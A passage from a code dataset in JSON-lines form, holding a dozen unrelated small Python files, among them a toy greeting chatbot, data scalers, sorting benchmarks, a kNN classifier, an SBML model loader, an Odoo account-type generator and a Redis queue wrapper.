(3.0)\n\nprint ('anyway :) ')\n\nname = input('Hello new human? whats your name? type in your answer and press enter ')\n\nfor i in range(1):\n    print ('\\nHello, '+name )\n    \n    time.sleep (1.0)\n    \n    print ('nice to meet you')\n    \ntime.sleep(2.0)\n\nage = input('\\nmay I ask you to type in your age ' +name)\ntime.sleep(1.0)\n\nfor i in range(1):\n    print (age+ ' wow!!!, thats really old! im only a few minutes old!')\n\ntime.sleep(4.0)\n\nprint ('\\nnow that I know your REEEEAAAALLLYYY old')\n\ntime.sleep(5.0)\n\nprint ('\\nI guess you got some real old people hobbies?')\ntime.sleep (3.0)\n\nprint ('\\n knitting? bowls perhaps?')\n\ntime.sleep(6.0)\n\nhobby = input('\\nCome on old timer :/ what is your favourite hobby? 
dont forget to press enter')\ntime.sleep(3.0)\n\nprint ('\\nthats quite a good hobby')\n    \ntime.sleep(3.0)\n\nprint ('\\nhave you spelt your hobbie correctly??????')\n    \ntime.sleep(4.0)\n\nprint ('let me check')\n\ntime.sleep(10.0)\n\nprint (hobby+ ' hmmmmmmmmm my database is very limited but ill let it pass')\n    \ntime.sleep(3.0)\n\nprint ('\\nnice to meet you ' +name )\n    \ntime.sleep(4.0)\n\nprint ('\\n Thank you for interfacing with me, bye' )\n\ntime.sleep(5.0)\n","sub_path":"Who are you.py","file_name":"Who are you.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"46836709","text":"# encoding=utf-8\nimport numpy as np\n\nclass StandardScaler(object):\n    def __init__(self, mean=0., std=1.):\n        self.mean = mean\n        self.std = std\n\n    def transform(self, data):\n        data = np.array(data)\n        if self.std == 0:\n            print(\"WARNING: The std is zero, the transform will not divide the std.\")\n            trans = data - self.mean\n        else:\n            trans = (data - self.mean) / self.std\n        return trans\n\n    def inverse_transform(self, data):\n        data = np.array(data)\n        if self.std == 0:\n            print(\"WARNING: The std is zero, the transform will not multiply the std.\")\n            trans = data + self.mean\n        else:\n            trans = (data * self.std) + self.mean\n        return trans\n\n    def save(self, path):\n        np.savez_compressed(path, mean=self.mean, std=self.std)\n\n    @classmethod\n    def load(cls, path):\n        data = np.load(path)\n        return cls(data['mean'], data['std'])\n\nclass OnehotScaler(object):\n    def __init__(self, num_classes, start):\n        self.num_classes = int(num_classes)\n        self.start = start\n\n    def transform(self, data):\n        data = np.array(data)\n        if len(data.shape) > 2:\n            raise Exception(\n                \"The shape of data is %s, but the input shape of data is required as (-1,1) or (-1,) for one-hot transform.\" % (\n                    data.shape))\n        elif len(data.shape) == 2 and data.shape[1] != 1:\n            raise Exception(\n                \"The shape of data is %s, but the input shape of data is required as (-1,1) or (-1,) for one-hot transform.\" % (\n                    data.shape))\n        else:\n            trans = data.reshape(-1)\n\n        if self.num_classes == 1:\n            trans = trans\n        else:\n            trans = data - self.start\n            trans = np.eye(self.num_classes)[trans.astype(int)]\n        return trans\n\n    def inverse_transform(self, data):\n        data = np.array(data)\n        if len(data.shape) > 2 or data.shape[-1] != self.num_classes:\n            raise Exception(\n                \"The shape of data is %s, but the input shape of data is required as (-1,%s) or (-1,) for one-hot transform.\" % (\n                    data.shape, self.num_classes))\n        trans = np.argmax(data, axis=1)\n        trans = trans + self.start\n        return trans\n\n    def save(self, path):\n        np.savez_compressed(path, num_classes=self.num_classes, start=self.start)\n\n    @classmethod\n    def load(cls, path):\n        data = np.load(path)\n        return cls(data['num_classes'], data['start'])\n\nclass StaticFeatureScaler(object):\n    def __init__(self):\n        features_name = ['fes_'+str(i+1) for i in range(16)]\n        features_type = {\"fes_1\": {\"float\": 1}, \"fes_2\": {\"float\": 1}, \"fes_3\": {\"one_hot\": 4, \"start\": 0},\n                         \"fes_4\": {\"one_hot\": 5, \"start\": 1}, \"fes_5\": {\"one_hot\": 4, \"start\": 0},\n                         \"fes_6\": {\"binary\": 1}, \"fes_7\": {\"binary\": 1}, \"fes_8\": {\"binary\": 1},\n                         \"fes_9\": {\"binary\": 1}, \"fes_10\": {\"binary\": 1}, \"fes_11\": {\"float\": 1},\n                         \"fes_12\": {\"float\": 1}, \"fes_13\": {\"float\": 1}, \"fes_14\": {\"binary\": 1},\n                         \"fes_15\": {\"one_hot\": 3, \"start\": 0}, \"fes_16\": {\"one_hot\": 3, \"start\": 0}}\n        idx2name = 
{}\n        self.idx2type = {}\n        for i in range(16):\n            idx2name[i] = features_name[i]\n            self.idx2type[i] = features_type[features_name[i]]\n        self.dim = 0\n        for i in self.idx2type:\n            the_type = self.idx2type[i]\n            for k in the_type:\n                if k == \"start\":\n                    continue\n                self.dim += the_type[k]\n\n    def transform(self, data):\n        node_num, feas_num = data.shape\n        features = []\n        for i in range(feas_num):\n            the_type = self.idx2type[i]\n            if \"float\" in the_type:\n                the_feature = np.reshape(data[:, i], (-1, 1))\n                i_scaler = StandardScaler(the_feature.mean(), the_feature.std())\n                the_feature = i_scaler.transform(the_feature)\n            elif \"one_hot\" in the_type:\n                the_feature = data[:, i]\n                num_classes, start = the_type[\"one_hot\"], the_type[\"start\"]\n                i_scaler = OnehotScaler(num_classes, start)\n                the_feature = i_scaler.transform(the_feature)\n            elif \"binary\" in the_type:\n                the_feature = np.reshape(data[:, i], (-1, 1))\n            else:\n                raise Exception(\"Error type of the feature (%s). (float/binary/one_hot is acceptable)\" % the_type)\n            if isinstance(features, list):\n                features = the_feature\n            else:\n                features = np.concatenate((features, the_feature), axis=1)\n        print(\"the features shape is %s\" % str(features.shape))\n        if features.shape[1] != self.dim:  # use != rather than 'is not' for numeric comparison\n            raise Exception(\"the shape of features should be %s\" % self.dim)\n        return features","sub_path":"codes/util/scaler.py","file_name":"scaler.py","file_ext":"py","file_size_in_byte":5018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"547475245","text":"import timeit\nfrom random import *\nimport matplotlib.pyplot as plt\n\ndef measureTime(a,x):\n    start = timeit.time.clock() \n    a(x)\n    elapsed = timeit.time.clock()\n    elapsed = elapsed - start\n    return elapsed\n\n\ndef MinSort(vector_numbers):\n\tfor j in range(len(vector_numbers)):\n\t\tmini = min(vector_numbers[j:len(vector_numbers)])\n\t\tmin_num = vector_numbers[j:len(vector_numbers)].index(mini)\n\t\tif vector_numbers[j] >= mini:\n\t\t\tvector_numbers[j], vector_numbers[(j+min_num)] = vector_numbers[(j+min_num)], vector_numbers[j]\n\t\telse: \n\t\t\tpass\n\treturn vector_numbers\n\n\ndef Bubble(x):\n\tn = range(len(x))\n\tn_rev = n[::-1]\n\tn_rev = n_rev[:-1]\n\tfor i in n:\n\t\tswap = False\n\t\tfor j in n_rev:\n\t\t\tif x[j] < x[j-1]:\n\t\t\t\tx[j], x[j-1] = x[j-1], x[j]\n\t\t\t\tswap = True \n\t\tif not swap:\n\t\t\tbreak\n\t\telse:\n\t\t\tpass\n\treturn x\n\ndef timeTest():\n\tsample = []\n\tBubbleTime = []\n\tMinSortTime = []\n\tfor len_vector in range(2,100):\n\t\tn = randrange(1,1234567)\n\t\tseed((len_vector * n))\n\t\tnumbersBubble = [randrange(-1000,1000) for i in xrange(len_vector)]\n\t\tseed((len_vector * n))\n\t\tnumbersMinSort = [randrange(-1000,1000) for i in xrange(len_vector)]\n\t\tsample.append(len_vector)\n\t\tBubbleTime.append(measureTime(Bubble, numbersBubble)) \n\t\tMinSortTime.append(measureTime(MinSort, numbersMinSort))\n\treturn [sample, BubbleTime, MinSortTime]\n\n\n# run the timing experiment once (the original ran it twice and discarded the first result)\ngraph = timeTest()\nlength_vector = graph[0]\nBubble_series = graph[1]\nMinSort_series = graph[2]\n\n\n# Plots\nplt.plot(length_vector, Bubble_series, 'r--', label=\"Bubble\")\nplt.plot(length_vector, MinSort_series, 'b--', label=\"MinSort\")\nplt.legend(loc=2)\nplt.axis([0, 100, 0, max(Bubble_series)])\n#plt.show()\nplt.savefig('hw3_mt.png')\n","sub_path":"hw3/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
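Note: the sort.py record above times its sorts with timeit.time.clock(); time.clock() was deprecated in Python 3.3 and removed in Python 3.8. A minimal, hypothetical sketch of a portable replacement for its measureTime() helper (editorial illustration, not part of the dataset record above):

from timeit import default_timer

def measure_time(sort_func, data):
    # default_timer selects the most precise wall clock available on the platform
    start = default_timer()
    sort_func(data)
    return default_timer() - start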
+{"seq_id":"484967348","text":"import tf2_ros\nimport rospy\n\nrospy.init_node(\"hi\")\nbuf = tf2_ros.Buffer()\ntf = tf2_ros.TransformListener(buf) \n\nfromFrame = \"left_hand_3\"\ntoFrame = \"right_hand_3\"\n\nbuf.lookup_transform(fromFrame, toFrame, rospy.Time.now())","sub_path":"testTF.py","file_name":"testTF.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"509304791","text":"\nimport re\n\nfrom urllib.parse import urlparse\n\nfrom xml.dom import *\nfrom xml.dom.minidom import parse\n\nfrom bs4 import BeautifulSoup\n\nfrom colomoto_jupyter import *\n\nif IN_IPYTHON:\n from IPython.display import Markdown\n\nurlidentifier = re.compile(\"https?://[^/]*\\\\bcellcollective\\.org/#(\\\\d+)\\\\b\")\n\ndef id_from_url(url):\n uri = urlparse(url)\n if uri.netloc:\n if uri.scheme == \"cellcollective\":\n return uri.netloc\n urlmatch = urlidentifier.search(url)\n if urlmatch:\n return urlmatch.group(1)\n\ndef url_matches(url):\n return id_from_url(url) is not None\n\nclass CellCollectiveConnector(object):\n def __init__(self, identifier):\n self.id = id_from_url(identifier) or identifier\n @property\n def sbml_url(self):\n return \"http://api.cellcollective.org/model/export/{}?type=SBML\".format(self.id)\n @property\n def sbml_basename(self):\n return \"{}.sbml\".format(self.id)\n\ndef connect(identifier):\n return CellCollectiveConnector(identifier)\n\n\nMETADATA_UNITPROTID = \"UniProtID\"\nMETADATA_GENENAME = \"GeneName\"\nMETADATA_NCBIGENEID = \"NCBIGeneID\"\n\nQUALNS = \"http://www.sbml.org/sbml/level3/version1/qual/version1\"\n\nclass CellCollectiveSBMLModel(object):\n def __init__(self, localfile):\n self.localfile = localfile\n self.dom = parse(localfile)\n self.root = self.dom.documentElement\n species_elts = self.root.getElementsByTagNameNS(QUALNS, \"qualitativeSpecies\")\n self.id2elt = dict([(e.getAttributeNS(QUALNS, \"id\"), e) \\\n for e in species_elts])\n self.name2id = dict([(e.getAttributeNS(QUALNS, \"name\"), id) \\\n for id, e in self.id2elt.items()])\n\n @property\n def species(self):\n \"\"\"\n Returns the set of defined species\n\n :rtype: set\n \"\"\"\n return set(self.name2id.keys())\n\n _key2metadata = {\n \"uniprotid\": METADATA_UNITPROTID,\n \"uniprotaccessionid\": METADATA_UNITPROTID,\n \"genename\": METADATA_GENENAME,\n \"ncbigeneid\": METADATA_NCBIGENEID,\n }\n\n def species_metadata(self, name):\n metadata = {}\n notes = self.id2elt[self.name2id[name]].getElementsByTagName(\"notes\")\n bodies = notes[0].getElementsByTagName(\"body\") if notes else None\n ps = bodies[0].getElementsByTagName(\"p\") if bodies else None\n if not ps:\n return metadata\n htmldata = BeautifulSoup(ps[0].firstChild.wholeText, \"html.parser\")\n divs = htmldata.find_all(\"div\")\n for div in divs:\n t = div.getText().split(\":\")\n if len(t) == 2:\n key = t[0].strip().replace(\" \",\"\").lower()\n value = t[1].strip()\n if key in self._key2metadata:\n metadata[self._key2metadata[key]] = value\n return metadata\n\n def species_uniprotkb(self, name):\n uniprotid = self.species_metadata(name).get(METADATA_UNITPROTID)\n if not uniprotid:\n return\n return URL(\"https://www.uniprot.org/uniprot/%s\" % uniprotid)\n\n def species_ncbi_gene(self, name):\n id = self.species_metadata(name).get(METADATA_NCBIGENEID)\n if not id:\n return\n return URL(\"https://www.ncbi.nlm.nih.gov/gene/%s\" % id)\n\n\n\ndef load(identifier):\n conn = None\n if isinstance(identifier, CellCollectiveConnector):\n conn = 
identifier\n elif url_matches(identifier):\n conn = CellCollectiveConnector(identifier)\n else:\n sbmlfile = identifier\n if conn:\n from colomoto_jupyter.io import download\n url = conn.sbml_url\n bname = conn.sbml_basename\n sbmlfile = download(url, suffix=bname)\n return CellCollectiveSBMLModel(sbmlfile)\n\ndef to_biolqm(model):\n biolqm = import_colomoto_tool(\"biolqm\")\n return biolqm.load(model.localfile)\n\n","sub_path":"cellcollective.py","file_name":"cellcollective.py","file_ext":"py","file_size_in_byte":3873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"297844018","text":"from keras_seg import preprocessing\nimport numpy as np\n\n\nclass MicroscopyPreprocessor(preprocessing.Preprocessor):\n\n def __init__(self, backbone=None):\n super().__init__(\n backbone=backbone,\n img_preprocesses=[\n preprocessing.convert_16_bit_to_8_bit,\n preprocessing.make_3d_grayscale,\n ],\n augmentations=[\n preprocessing.augmentations.get_rigid_augmentation(),\n preprocessing.augmentations.get_non_spatial_augmentation()\n ]\n )\n\n def prep_images_and_masks_for_cell_segmentation(self, images, masks):\n return self.preprocess_batch(images), self.preprocess_masks(masks)\n\n def prep_images_and_masks_for_fluo_segmentation(self, cell_images, fluo_images, masks):\n images = np.stack([cell_images, fluo_images, fluo_images], axis=-1)\n return self.preprocess_batch(images), self.preprocess_masks(masks)\n\n","sub_path":"MicroAnalyzer/MicroscopyPreprocessor.py","file_name":"MicroscopyPreprocessor.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"634657491","text":"import math\nimport numpy as np\ndef formula(l,x):\n p1 = 0\n for i in range(len(l)-1):\n p1 = p1 + ((l[i] - x[i]) ** 2)\n # print(l[i],x[i], p1)\n squad = math.sqrt(p1)\n return squad\n\ndef ordena(base, dis):\n cop = sorted(dis)\n nova = []\n # print(cop)\n # print(dis)\n for i in range(len(cop)):\n for j in range(len(dis)):\n if cop[i] == dis[j]:\n # print(\"{}x{}-{}\\t\\t{}\".format(i,j,cop[i],base[j][3]))\n nova.append(base[j])\n\n # print(\"\\n\\n\")\n # for i in range(len(nova)):\n # print(base[i], nova[i])\n return nova\n\ndef calcula_distancia(base,x):\n d = []\n for i in range(len(base)):\n aux = formula(base[i], x)\n d.append(aux)\n # print(d)\n return d\n # baseordena(base,d)\n\ndef ff(f,i):\n # if i == 0:\n # return\n # print(f)\n A,B = 0,0\n for j in range(i):\n if f[j][3] == 'A':\n A += 1\n else:\n B += 1\n # print(\"\\n\")\n\n if A == B:\n return '?'\n elif A > B:\n return 'A'\n else:\n return 'B'\n\n\n\ndef frequencia(ord):\n aux = 0\n m = []\n for i in range(len(ord)):\n f = []\n for j in range(i+1):\n f.append(ord[j])\n # print(ord[j])\n aux = i+1\n maior = ff(f,aux)\n m.append(maior)\n # print(m)\n A,B = 0,0\n for i in range(len(m)):\n if m[i] == 'A':\n A += 1\n else:\n B += 1\n if A == B:\n return '?'\n elif A > B:\n return 'A'\n else:\n return 'B'\n\n\n\ndef main():\n base = [\n [3,7,8,'A'],\n [3,2,9,'A'],\n [0,1,1,'B'],\n [4,1,2,'A'],\n [1,3,7,'B'],\n [1,1,1,'B'],\n ]\n x = [3,7,7]\n distancia = calcula_distancia(base,x)\n ordenado = ordena(base, distancia)\n freq = frequencia(ordenado)\n # for i in range(len(ordenado)):\n # print(base[i], ordenado[i])\n print(\"a classe encontrada foi {}\".format(freq))\n 
return\n\nmain()\n","sub_path":"knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"549243780","text":"import json\nfrom urllib.request import urlopen\n\n\ndef returnComic(number = None):\n url = ''\n if number == None:\n url = 'http://xkcd.com/info.0.json'\n else :\n url = 'http://xkcd.com/' + number + '/info.0.json'\n result = urlopen(url).read().decode('utf8')\n data = json.loads(result)\n return data['safe_title'] + \"\\n\" + data['img'] + \"\\nAlt text: \" + data['alt']\n ","sub_path":"FlaskWebProject/xkcdScript.py","file_name":"xkcdScript.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"211837347","text":"import unittest\n\nfrom protocat.search import RobinKarpSearcher\n\n\nclass TestRobinKarp(unittest.TestCase):\n\n def test_single_pattern_multiple_match(self):\n\n text = 'Random example'\n pattern = 'example'\n\n offset = text.index(pattern)\n limit = offset + len(pattern)\n\n matches = RobinKarpSearcher(['example']).process(text)\n\n self.assertEqual(len(matches), 1)\n self.assertEqual((offset, limit), matches[0])\n\n def test_single_pattern_no_match(self):\n\n text = 'Random example'\n pattern = 'no match'\n\n search_matches = RobinKarpSearcher([pattern]).process(text)\n\n self.assertEqual(len(search_matches), 0)\n\n def test_single_pattern_multiple_match(self):\n \n text = 'Random example for an example'\n pattern = 'example'\n\n matches = [\n (text.index(pattern), text.index(pattern) + len(pattern)),\n (text.rindex(pattern), text.rindex(pattern) + len(pattern)),\n ]\n\n search_matches = RobinKarpSearcher(['example']).process(text)\n\n self.assertEqual(len(search_matches), 2)\n\n self.assertTrue(matches[0] in search_matches)\n self.assertTrue(matches[1] in search_matches)\n\n def test_multiple_pattern_single_pattern_match(self):\n \n text = 'Random example for an example'\n patterns = ['example', 'no match']\n\n matches = [\n (text.index(patterns[0]), text.index(patterns[0]) + len(patterns[0])),\n (text.rindex(patterns[0]), text.rindex(patterns[0]) + len(patterns[0])),\n ]\n\n search_matches = RobinKarpSearcher(patterns).process(text)\n\n self.assertTrue(len(search_matches), 2)\n self.assertTrue(matches[0] in search_matches)\n self.assertTrue(matches[1] in search_matches)\n\n def test_multiple_pattern_no_match(self):\n pass\n\n def test_multiple_pattern_multiple_match(self):\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"protocat_tests/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"284605855","text":"# -*- coding: utf-8 -*-\ntry:\n from xlrd import open_workbook\n import xml.etree.cElementTree as ET\n from xml.dom import minidom\nexcept ImportError:\n pass\n\nxl_workbook = open_workbook('arsredovisning-2017-09-30.xlsx')\n\nresultatrakning = xl_workbook.sheet_by_index(2)\nbalansrakning = xl_workbook.sheet_by_index(4)\n\nr_element_name = 8\nr_title = 10\n# ~ r_saldo = 13\nr_documentation = 16\nr_account_type = 50\nr_element_nix = []\nr_main_type = [\n 'RorelsensIntakterLagerforandringarMmAbstract',\n 'RorelsekostnaderAbstract',\n 'FinansiellaPosterAbstract',\n 'BokslutsdispositionerAbstract',\n 'SkatterAbstract',\n]\n\nb_element_name = 9\nb_title = 11\n# ~ b_saldo = 14\nb_documentation = 
17\nb_account_type = 43\nb_element_nix = [\n 'ImmateriellaAnlaggningstillgangar',\n 'MateriellaAnlaggningstillgangar',\n 'FinansiellaAnlaggningstillgangar',\n 'VarulagerMm',\n 'KortfristigaFordringar',\n 'KortfristigaPlaceringar',\n 'ObeskattadeReserver',\n 'LangfristigaSkulder',\n 'KortfristigaSkulder',\n]\nb_main_type = [\n 'TillgangarAbstract',\n 'EgetKapitalSkulderAbstract',\n]\n\nr_lst = []\nb_lst = []\n\n# key: element_name\n# value: external_id\nexternal_id_exchange_dict = {\n 'Kundfordringar': 'account.data_account_type_receivable',\n 'Leverantorsskulder': 'account.data_account_type_payable',\n 'KassaBankExklRedovisningsmedel': 'account.data_account_type_liquidity',\n 'CheckrakningskreditKortfristig': 'account.data_account_type_credit_card',\n 'OvrigaFordringarKortfristiga': 'account.data_account_type_current_assets',\n 'KoncessionerPatentLicenserVarumarkenLiknandeRattigheter': 'account.data_account_type_non_current_assets',\n 'ForskottFranKunder': 'account.data_account_type_prepayments',\n 'MaskinerAndraTekniskaAnlaggningar': 'account.data_account_type_fixed_assets',\n 'OvrigaKortfristigaSkulder': 'account.data_account_type_current_liabilities',\n 'OvrigaLangfristigaSkulderKreditinstitut': 'account.data_account_type_non_current_liabilities',\n 'Aktiekapital': 'account.data_account_type_equity',\n 'AretsResultat': 'account.data_unaffected_earnings',\n 'OvrigaRorelseintakter': 'account.data_account_type_other_income',\n 'Nettoomsattning': 'account.data_account_type_revenue',\n 'AvskrivningarNedskrivningarMateriellaImmateriellaAnlaggningstillgangar': 'account.data_account_type_depreciation',\n 'OvrigaRorelsekostnader': 'account.data_account_type_expenses',\n 'HandelsvarorKostnader': 'account.data_account_type_direct_costs',\n}\n\ndef get_account_range(sheet, account_type, row):\n account_range = []\n col = account_type\n while (sheet.cell(row, col).value == 'BAS-konto'):\n account_range.append(sheet.cell(row, col+1).value)\n col += 8\n return account_range\n\ndef get_range_domain(number_list):\n code_list = []\n for number in number_list:\n if 'x' in number:\n if '-' in number:\n code_list += [str(i) for i in range(int(number.split('-')[0].replace('x', '0')), int(number.split('-')[1].replace('x', '9'))+1)]\n else:\n code_list += [str(i) for i in range(int(number.replace('x', '0')), int(number.replace('x', '9'))+1)]\n else:\n if '-' in number:\n code_list += [str(i) for i in range(int(number.split('-')[0]), int(number.split('-')[1])+1)]\n else:\n code_list += [number]\n return [('code', 'in', code_list)]\n\ndef get_type(lst):\n if '1930' in lst:\n return 'liquidity'\n elif '2440' in lst:\n return 'payable'\n elif '1510' in lst:\n return 'receivable'\n else:\n return 'other'\n\ndef read_sheet(sheet=None, element_name=0, title=0, documentation=0, account_type=0, main_type=[] ,report_type='', nix=[], lst=None):\n mtype = ''\n for row in range(1, sheet.nrows):\n if sheet.cell(row, account_type).value == 'BFNAR':\n pass\n # ~ lst.append({\n # ~ 'name': sheet.cell(row, title).value,\n # ~ 'type': 'sum',\n # ~ 'element_name': sheet.cell(row, element_name).value,\n # ~ 'belong': sheet.cell(row, belong).value,\n # ~ 'data_type': sheet.cell(row, data_type).value,\n # ~ 'note': sheet.cell(row, documentation).value,\n # ~ })\n if sheet.cell(row, account_type).value == 'BFNAR' and sheet.cell(row, element_name).value in main_type:\n mtype = sheet.cell(row, element_name).value\n if sheet.cell(row, account_type).value == 'BAS-konto' and sheet.cell(row, element_name).value not in nix:\n if 
sheet.cell(row, element_name).value == 'OvrigaKortfristigaSkulder':\n account_type += 16\n domain = get_range_domain(get_account_range(sheet, account_type, row))\n lst.append({\n 'name': sheet.cell(row, title).value,\n 'type': get_type(domain[0][2]),\n 'element_name': sheet.cell(row, element_name).value,\n 'note': sheet.cell(row, documentation).value,\n 'account_range': domain,\n 'main_type': mtype,\n 'report_type': report_type,\n })\n\nread_sheet(resultatrakning, r_element_name, r_title, r_documentation, r_account_type, r_main_type, 'r', r_element_nix, r_lst)\nread_sheet(balansrakning, b_element_name, b_title, b_documentation, b_account_type, b_main_type, 'b', b_element_nix, b_lst)\n\ndef print_xml(sheet_list):\n def parse_xml(sheet_list):\n odoo = ET.Element('odoo')\n data = ET.SubElement(odoo, 'data')\n for lst in sheet_list:\n for l in lst:\n external_id = external_id_exchange_dict.get(l.get('element_name'), 'type_%s' %l.get('element_name'))\n record = ET.SubElement(data, 'record', id=external_id, model=\"account.account.type\")\n field_name = ET.SubElement(record, \"field\", name=\"name\").text = l.get('name')\n field_element_name = ET.SubElement(record, \"field\", name=\"element_name\").text = l.get('element_name')\n field_type = ET.SubElement(record, \"field\", name=\"type\").text = l.get('type')\n field_main_type = ET.SubElement(record, \"field\", name=\"main_type\").text = l.get('main_type')\n field_report_type = ET.SubElement(record, \"field\", name=\"report_type\").text = l.get('report_type')\n field_account_range = ET.SubElement(record, \"field\", name=\"account_range\").text = str(l.get('account_range'))\n field_note = ET.SubElement(record, \"field\", name=\"note\").text = l.get('note')\n ET.SubElement(data, 'function', name='_change_name', model=\"account.account.type\")\n return odoo\n xml = minidom.parseString(ET.tostring(parse_xml(sheet_list))).toprettyxml(indent=\" \")\n xml = xml.replace('', '')\n with open(\"../data/account_account_type.xml\", \"w\") as f:\n f.write(xml.encode('utf-8'))\n\nprint_xml([r_lst, b_lst])\n\n# ~ # Test script\n# ~ print \"\"\"\n# ~ \n # ~ \n# ~ \"\"\"\n\n# ~ for r in r_lst:\n # ~ print \"\"\" \n # ~ %s\n # ~ %s\n # ~ %s\n # ~ %s\n # ~ %s\n # ~ %s\n # ~ %s\n # ~ \n # ~ \"\"\" %(r.get('element_name'), r.get('name'), r.get('type'), r.get('element_name'), r.get('main_type'), r.get('report_type'), r.get('account_range'), r.get('note'))\n\n# ~ for b in b_lst:\n # ~ print \"\"\" \n # ~ %s\n # ~ %s\n # ~ %s\n # ~ %s\n # ~ %s\n # ~ %s\n # ~ %s\n # ~ \n # ~ \"\"\" %(b.get('element_name'), b.get('name'), b.get('type'), b.get('element_name'), b.get('main_type'), b.get('report_type'), b.get('account_range'), b.get('note'))\n\n# ~ print \"\"\" \n# ~ \n# ~ \"\"\"\n","sub_path":"l10n_se_mis/bin/create_account_account_type_data.py","file_name":"create_account_account_type_data.py","file_ext":"py","file_size_in_byte":8440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"183363952","text":"#-------------------------------------------------------------------------------\n# Name: entry_buffer\n# Purpose: Extends deque() in order to store the entry that we need to analyze\n# but offers several others functionalities\n#\n# Author: Rudy\n#\n# Created: 30/11/2013\n#-------------------------------------------------------------------------------\n\nfrom collections import deque, Counter\nfrom .log_entry import LogEntry\nfrom .alert_state import AlertState\n\nclass EntryBuffer(deque):\n\n def 
__init__(self,watchPeriod=2):\n super().__init__()\n self.popularities=Counter()\n self.statuses=Counter()\n self.watchPeriod=watchPeriod\n self.alert=AlertState()\n\n\n def addNewEntry(self,unparsedEntry):\n \"\"\"\n Parse the entry to convert it to an Entry object\n Add it to the buffer and update the stats\n @param unparsedEntry: Line of the log file\n \"\"\"\n newEntry=LogEntry(unparsedEntry)\n self.popularities[newEntry.section]+=1\n self.statuses[newEntry.status]+=1\n self.append(newEntry)\n\n\n def emptyOldEntries(self,now):\n \"\"\"\n Remove the entry that are older than the period (watchPeriod) we need\n @param now:Epoch of the moment where we read this entry ~right now\n \"\"\"\n while len(self)!=0 and now-self.watchPeriod*60>self[0].epoch:\n toDel=self.popleft()\n self.popularities[toDel.section]-=1\n self.statuses[toDel.status]-=1\n\n\n def updateAlert(self):\n \"\"\"\n Update the alert with the latest state and return a message to display\n if a change in the alert state happened\n \"\"\"\n return self.alert.update(len(self))\n\n\n def getMostPopular(self):\n \"\"\"\n Returns the section of the site with the most hits during the last 2 min\n \"\"\"\n if len(self)!=0:\n popular=self.popularities.most_common(1)[0]\n return popular[0], popular[1], len(self)\n else:\n return None,None,None\n\n\n def getStatusRepartition(self):\n \"\"\"\n Returns the number of request that had a Success, Client Error and\n Server Error status during the last 2 min\n Redirection and Information are not considered because they are arbitrarily\n juged less important, perhaps wrongfully\n \"\"\"\n okStatuses=0\n serverFaultStatuses=0\n clientFaultStatuses=0\n for key in self.statuses:\n if key.startswith(\"2\"):\n okStatuses+=self.statuses[key]\n elif key.startswith(\"4\"):\n clientFaultStatuses+=self.statuses[key]\n elif key.startswith(\"5\"):\n serverFaultStatuses+=self.statuses[key]\n return okStatuses, clientFaultStatuses, serverFaultStatuses\n\n\n\n def getAlertStatus(self):\n \"\"\"\n Returns the status of the Traffic monitoring\n \"\"\"\n return self.alert.status()\n\n\n\n\n\n\n\n","sub_path":"log_monitor/entry_buffer.py","file_name":"entry_buffer.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"272590738","text":"#-*- coding: UTF-8 -*-\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\nimport os\ncurrentUrl = os.path.dirname(__file__)\nparentUrl = os.path.abspath(os.path.join(currentUrl, os.pardir))\nsys.path.append(parentUrl)\nimport redis\nfrom settings import RedisHost\n\n\nclass RedisQueue(object):\n \"\"\"Simple Queue with Redis Backend\"\"\"\n def __init__(self, namespace, name ):\n \"\"\"The default connection parameters are: host='localhost', port=6379, db=0\"\"\"\n self.__db= redis.from_url(\"redis://{}:{}/{}\".format(RedisHost['host'],\n RedisHost['port'],\n RedisHost['db']))\n self.key = '%s:%s' %(namespace, name)\n\n def qsize(self):\n \"\"\"Return the approximate size of the queue.\"\"\"\n return self.__db.llen(self.key)\n\n def empty(self):\n \"\"\"Return True if the queue is empty, False otherwise.\"\"\"\n return self.qsize() == 0\n\n def put(self, item, namespace=\"\"):\n \"\"\"Put item into the queue.\"\"\"\n nam = self.key if namespace == \"\" else namespace\n self.__db.rpush(nam, item)\n\n def get(self, block=True, timeout=None, namespace=\"\"):\n \"\"\"Remove and return an item from the queue.\n\n If optional args block is true and timeout is None (the default), 
block if necessary until an item is available.\"\"\"\n\n        nam = self.key if namespace == \"\" else namespace\n        if block:\n            item = self.__db.blpop(nam, timeout=timeout)\n        else:\n            item = self.__db.lpop(nam)\n\n        if item:\n            item = item[1]\n        return item\n\n    def get_nowait(self):\n        \"\"\"Equivalent to get(False).\"\"\"\n        return self.get(block=False)","sub_path":"middles/middleWare/fakeQueue.py","file_name":"fakeQueue.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"159220331","text":"from nltk.tokenize.regexp import RegexpTokenizer\nfrom InstTable import *\nfrom LiteralTable import *\nfrom SymbolTable import *\nfrom TokenTable import *\nfrom Token import *\n\"\"\"\n * This class oversees the whole process of splitting the user's program code into words, analyzing their meaning, and converting them into the final code.
